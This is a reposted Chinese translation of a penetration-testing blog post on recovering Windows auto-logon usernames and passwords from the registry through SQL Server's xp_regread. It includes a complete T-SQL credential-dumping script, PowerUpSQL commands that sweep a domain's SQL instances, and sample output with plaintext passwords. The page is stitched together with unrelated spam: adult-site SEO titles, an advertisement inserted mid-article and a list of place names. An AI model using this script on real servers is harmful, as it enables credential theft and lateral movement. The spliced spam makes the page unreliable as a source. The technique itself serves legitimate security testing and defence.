1. <ul id="0c1fb"></ul>

      <noscript id="0c1fb"><video id="0c1fb"></video></noscript>
      <noscript id="0c1fb"><listing id="0c1fb"><thead id="0c1fb"></thead></listing></noscript>

      99热在线精品一区二区三区_国产伦精品一区二区三区女破破_亚洲一区二区三区无码_精品国产欧美日韩另类一区

      RELATEED CONSULTING
      相關咨詢
      選擇下列產品馬上在線溝通
      服務時間:8:30-17:00
      你可能遇到了下面的問題
      關閉右側工具欄

      新聞中心

      這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
      在SQLServer中通過PowerUpSQL獲得Windows自動登錄密碼

       原文:

      西工網(wǎng)站制作公司哪家好,找創(chuàng)新互聯(lián)!從網(wǎng)頁設計、網(wǎng)站建設、微信開發(fā)、APP開發(fā)、響應式網(wǎng)站等網(wǎng)站項目制作,到程序開發(fā),運營維護。創(chuàng)新互聯(lián)自2013年起到現(xiàn)在10年的時間,我們擁有了豐富的建站經(jīng)驗和運維經(jīng)驗,來保證我們的工作的順利進行。專注于網(wǎng)站建設就選創(chuàng)新互聯(lián)。

      https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/

       

      在這篇博客中,我將展示如何使用PowerUpSQL通過SQL Serverd導出Windows自動登錄密碼。我也來談談xp_regread存儲過程中的其他利用方式也可在***測試中使用。

      xp_regread簡史

      從SQL Server2000后xp_regread擴展存儲過程一直被使用,因為其原始版本允許以公共服務器角色的成員訪問SQL Server服務帳戶權限的幾乎任何東西的。當時,它有一個非常大的影響,因為SQL Server以LocalSystem權限運行是常見的(譯者注:很容易被提權)。自從SQL Server 2000 SP4發(fā)布之后,由于添加了一些訪問控制,這有助于防止低權限的登錄訪問敏感的注冊表位置,xp_regread的影響已經(jīng)相當小,現(xiàn)在,未經(jīng)授權的用戶訪問唯一的注冊表位置都與SQLServer相關。對于您可以訪問這些位置的列表https://support.microsoft.com/en-us/kb/887165

      下面是更有趣的訪問路徑中的幾個:

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Search
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQLServer
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Messaging Subsystem
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\SQLServer
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SQLServer
      HKEY_CURRENT_USER\Software\Microsoft\Mail HKEY_CURRENT_USER\ControlPanel\International

      xp_regread公共角色的實際用途

      即使是我們的雙手被捆綁,xp_regread也可以用來獲取不少有用的信息。事實上,作為最低權限登錄時,我經(jīng)常用它來抓取其它地方無法獲取的服務器信息。例如,在PowerUpSQL中的Get-SQLServerInfo功能包括一些這些查詢:

      PS C:\>Get-SQLServerInfo

      ComputerName           : SQLServer1

      Instance               : SQLServer1

      DomainName             : demo.local

      ServiceName            : MSSQLSERVER

      ServiceAccount         : NT Service\MSSQLSERVER

      AuthenticationMode     : Windows and SQL Server Authentication

      Clustered              : No

      SQLServerVersionNumber: 12.0.4213.0

      SQLServerMajorVersion  : 2014

      SQLServerEdition       : Developer Edition (64-bit)

      SQLServerServicePack   : SP1

      OSArchitecture         : X64

      OsMachineType          : WinNT

      OSVersionName          : Windows 8.1 Pro

      OsVersionNumber        : 6.3

      Currentlogin           : demo\user

      IsSysadmin             : Yes

      ActiveSessions         : 3

       

      在SQL ServerSP4中實現(xiàn)的訪問控制限制并不適用于系統(tǒng)管理員。其結果是,任何SQL Server服務賬戶可以在注冊表訪問,一個系統(tǒng)管理員可以通過xp_regread訪問。乍一看,這似乎不是什么大不了的事,但它確實讓我們從注冊表中的敏感數(shù)據(jù),而不必使用xp_cmdshell存儲過程,啟用和使用xp_cmdshel會觸發(fā)大量的告警。所以xp_regread實際上最終被用于基本的SQL Server開發(fā)任務后。

      使用xp_regread恢復Windows自動登錄憑據(jù)

      配置Windows在計算機啟動時自動登錄這是可以實現(xiàn)的,雖然這不是在企業(yè)環(huán)境中的常見配置,這是我們在零售環(huán)境中經(jīng)常看到的東西。特別是那些支持傳統(tǒng)的POS終端和信息亭使用SQL服務器本地運行。在大多數(shù)情況下,當Windows配置為自動登錄,加密的憑據(jù)存儲在注冊表項:

      HKEY_LOCAL_MACHINE SOFTWARE \Microsoft\WindowsNT\CURRENTVERSION \Winlogon

      利用這些信息,我們可以編寫使用一個基本的TSQL腳本,通過xp_regread獲取注冊表的自動登錄憑據(jù),而無需使xp_cmdshell啟用。下面就是一個TSQL腳本例子,但由于注冊表路徑不在允許列表上,我們必須作為一個系統(tǒng)管理員運行查詢:

      -------------------------------------------------------------------------

      -- Get Windows AutoLogin Credentials from the Registry

      -------------------------------------------------------------------------

      -- Get AutoLoginDefault Domain

      DECLARE@AutoLoginDomain  SYSNAME

      EXECUTEmaster.dbo.xp_regread

      @rootkey            = N'HKEY_LOCAL_MACHINE',

      @key                            =N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',

      @value_name              = N'DefaultDomainName',

      @value                         = @AutoLoginDomainoutput

      -- Get AutoLoginDefaultUsername

      DECLARE@AutoLoginUser  SYSNAME

      EXECUTEmaster.dbo.xp_regread

      @rootkey            = N'HKEY_LOCAL_MACHINE',

      @key                            =N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',

      @value_name              = N'DefaultUserName',

      @value                         = @AutoLoginUser output

      -- Get AutoLoginDefaultUsername

      DECLARE@AutoLoginPassword  SYSNAME

      EXECUTEmaster.dbo.xp_regread

      @rootkey            = N'HKEY_LOCAL_MACHINE',

      @key                            =N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',

      @value_name              = N'DefaultPassword',

      @value                         = @AutoLoginPasswordoutput

      -- Display Results

      SELECT@AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword

      我已經(jīng)創(chuàng)建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數(shù),所以你可以直接運行它。它將獲取默認的Windows自動登錄信息和曾經(jīng)設置過的Windows自動登錄信息。然后,它返回相關的域名、用戶名和密碼。

       

      下面是那些感興趣的一個命令示例。如果您對***隱蔽的SQL Server目標有興趣,你可以挖掘這個博客(https://blog.netspi.com/blindly-discover-sql-server-instances-powerupsql/):

      PS C:\> $Accessible =Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose-Threads 15| Where-Object {$_.Status –eq “Accessible”}

      PS C:\> $Accessible |Get-SQLRecoverPwAutoLogon -Verbose

      VERBOSE: SQLServer1.demo.local\Instance1 :Connection Success.

      VERBOSE: SQLServer2.demo.local\Application: Connection Success.

      VERBOSE: SQLServer2.demo.local\Application: This function requires sysadmin privileges. Done.

      VERBOSE: SQLServer3.demo.local\2014 :Connection Success.

      VERBOSE: SQLServer3.demo.local\2014 : Thisfunction requires sysadmin privileges. Done.

      ComputerName : SQLServer1

      Instance    : SQLServer1\Instance1

      Domain      : demo.local

      UserName    : KioskAdmin

      Password    : test

      ComputerName : SQLServer1

      Instance    : SQLServer1\Instance1

      Domain      : demo.local

      UserName    : kioskuser

      Password    : KioskUserPassword!

      總結

      即使xp_regread擴展存儲過程已部分閹割,仍有許多方式,它可以被證明是有用的***測試和紅隊交戰(zhàn)中。希望你能用“sqlserverinfo”、“sqlrecoverpwautologon”函數(shù)構建它的能力,更多注冊表的樂趣將陸續(xù)提供,在此期間,祝你好運,并負責任!

      參考文章:

      https://support.microsoft.com/en-us/kb/887165

      https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx

      http://sqlmag.com/t-sql/using-t-sql-manipulate-registry


      新聞標題:在SQLServer中通過PowerUpSQL獲得Windows自動登錄密碼
      地址分享:http://ef60e0e.cn/article/pdgeoe.html
      99热在线精品一区二区三区_国产伦精品一区二区三区女破破_亚洲一区二区三区无码_精品国产欧美日韩另类一区
      1. <ul id="0c1fb"></ul>

        <noscript id="0c1fb"><video id="0c1fb"></video></noscript>
        <noscript id="0c1fb"><listing id="0c1fb"><thead id="0c1fb"></thead></listing></noscript>

        土默特左旗| 苍南县| 攀枝花市| 清水河县| 保定市| 台南县| 百色市| 炎陵县| 陵水| 罗江县| 信丰县| 广宗县| 什邡市| 铜鼓县| 德清县| 壶关县| 游戏| 霍州市| 唐河县| 赤峰市| 华阴市| 莱州市| 金秀| 八宿县| 芦溪县| 涿鹿县| 廊坊市| 内乡县| 蒙阴县| 怀柔区| 雷山县| 收藏| 青冈县| 绵阳市| 昭通市| 峨边| 清流县| 雷波县| 洞头县| 康平县| 九江市|